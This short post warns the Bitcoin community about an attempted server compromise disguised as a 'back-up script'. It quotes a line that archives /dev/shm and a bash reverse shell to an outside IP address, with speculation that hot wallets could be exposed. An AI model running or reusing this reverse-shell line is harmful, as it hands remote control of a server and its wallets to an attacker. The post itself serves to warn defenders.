Mr P. was hit
earlier today, to no actual effect.
While the attackers targetted his blog, the MO may have larger implications for the Bitcoin community, because the attacker was trying to get
this script run on the server. The relevant part there is:
tar -cvzPf /root/$DIR/$DATE/$DATE-$SERVER-etc.tar.gz /dev/shm
echo "Uploading backed up data."
bash -i >& /dev/tcp/96.43.130.122/80 0>&1
which could perhaps compromise an electrum wallet? (or more generally any hotwallet if /shm is sloppily being used).
This would be a good time for everyone running a hotwallet on a hosted/managed server to review their use of /shm, because you never know when an overworked entry level support person will just run a "back-up script" on your account.
